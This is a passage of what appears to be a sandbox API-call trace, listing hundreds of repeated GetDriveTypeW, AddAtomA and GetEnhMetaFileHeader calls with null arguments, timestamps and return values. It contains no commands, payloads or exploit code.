(lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) 
returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) 
returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 
0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 